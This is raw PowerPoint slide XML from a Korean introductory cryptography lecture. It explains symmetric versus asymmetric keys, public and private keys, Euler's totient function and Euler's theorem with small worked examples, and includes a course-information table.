          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호화 키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>복호화 키</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E461072-F3E9-42F4-8382-B839301C47CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966621" y="6252424"/>
            <a:ext cx="3193207" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>키교환</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 필요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="RAON CTF - WEB Essential">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B96E0AD-7A00-4F5D-99E8-561C8EACC7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6848" y="2507273"/>
            <a:ext cx="6330043" cy="3557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3991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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>비대칭키</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F752891A-12E4-42A2-8EE5-FAD7E43B7C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758307" y="1950142"/>
            <a:ext cx="1208314" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>비대칭키 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{577D6702-CFF7-401E-8A79-444745396055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2086848" y="1950142"/>
            <a:ext cx="8018301" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공개키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>모든 사람이 접근 가능한 키</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개인키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자만이 가지고 있는 키</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E461072-F3E9-42F4-8382-B839301C47CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966621" y="6252424"/>
            <a:ext cx="3193207" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>키교환</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 할 필요가 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7AB115-6086-416B-865A-083B9F33B6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1826077" y="2755354"/>
            <a:ext cx="8215995" cy="3220071"/>
            <a:chOff x="1826077" y="2755354"/>
            <a:chExt cx="8215995" cy="3220071"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3074" name="Picture 2" descr="암호학] 대칭키 vs 공개키(비대칭키) 암호화 차이">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5B23294-EF48-4C92-ABFC-1310668027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6077" y="2755354"/>
              <a:ext cx="8215995" cy="3220071"/>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38D53DBE-80BE-4784-886F-13A48E670B09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8156121" y="5412921"/>
              <a:ext cx="1869622" cy="4653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2218869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이과주의] 숫자의 원자 소수의 비밀을 아는자가 세상을 지배한다 - 인스티즈(instiz) 인티포털">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C24BD2E2-B7CC-4595-B403-281CAA2FE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663" y="2938348"/>
            <a:ext cx="2950195" cy="20949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AON CTF - WEB Essential">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9B21D7-D404-448F-8C78-1A51153EB5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4679" y="1829778"/>
            <a:ext cx="8055177" cy="4513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02305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1cf0f8fb,7dc31bad2e800fecea8ccdbe7d782543</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700" kern="0" dirty="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알고리즘을 이해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실행 단추: 문서 32">
            <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8E6399-6C6C-45E1-8F02-79DA716AD5BF}"/>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469693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55CF3B43-3E41-4D83-921D-577C88622BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2514220840"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3072320" y="2456501"/>
          <a:ext cx="6047359" cy="2899156"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="800735">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3283276046"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5246624">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4194568348"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="85788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교과목</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소개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암호 및 인증의 일반 이론 습득 및 응용 분야에 대한</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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주요 정보보호 기술의 이해</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499094"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="58356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교육목표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군 정보체계에 적용 중인 정보보호 기술을 이해할 수 있는 실력 함양</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8879915"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1457706">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주교재 및</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참고교재</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주교재</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강의안</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참고교재 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>필수는 아님</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</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정보보호총론</a:t>
                      </a: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장상수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"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생능출판</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="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150549"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181DB433-A7D4-4D00-A599-93280DCD010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3E5B63B-C68C-4C3A-ADC2-F1E9A8863B5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6BA385F-ED91-4794-9F4D-FA852FA502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7925F25-7F8B-477B-818B-85674A07FE0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105905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dirty="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4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8F985A5-BC79-4AFA-8536-92790B70CA5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0465606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개인키와 암호문을 복사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>붙혀넣기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 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6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE699C98-5ECA-42BF-947E-FD7EE96DF9E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00899DB7-DEAC-45A3-A2B7-E6B0FE242635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412521" y="808264"/>
            <a:ext cx="5494150" cy="4397149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329286471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B1898AA4-44B7-43D9-B184-DD83185EB435}"/>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9854741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함수</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C95BEC33-088C-4B34-BED4-79514351C177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682300" y="1897856"/>
            <a:ext cx="8490400" cy="765668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(n)  : 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>까지의 양의 정수 중에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>서로소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>인 것의 개수</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{885C1A6E-C88C-4947-97E8-BCAFEBE98F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682300" y="2804018"/>
            <a:ext cx="8490400" cy="3044332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>ex)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(6)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5 } =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(6) = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:latin typeface="Nanum Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:latin typeface="Nanum Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>ex)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(7)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2, 3, 4, 5, 6} =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(7) = 6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254927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B6B1A9C0-B37A-42BD-9CDA-F9465466D0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1413240" y="1690688"/>
            <a:ext cx="8740410" cy="765668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>이 정수이고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>서로소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>일때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FFA533A-6999-42EC-98AB-9A306FEBFD1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267450" y="1751519"/>
            <a:ext cx="3443287" cy="644006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3139390-90DA-4D1F-B4D5-BA9FF3D74D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1413240" y="2596849"/>
            <a:ext cx="8740410" cy="4137326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>ex)  a = 5, m = 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>    5^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> φ(6) = 5^2 = 25 = 6*4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6)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:latin typeface="Nanum Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>ex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>)  a = 2, m = 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>    2^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> φ(7) = 2^6 = 64 = 7*9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latin typeface="Nanum Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>ex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>)  a = 3, m = 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>    3^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> φ(7) = 3^6 = 729 = 7*104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p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202928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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 정리</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오일러</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정리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신기하다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근데 이유를 모르겠다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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   다음 조건에 맞게 프로그래밍 </a:t>
            </a:r>
            <a:r>
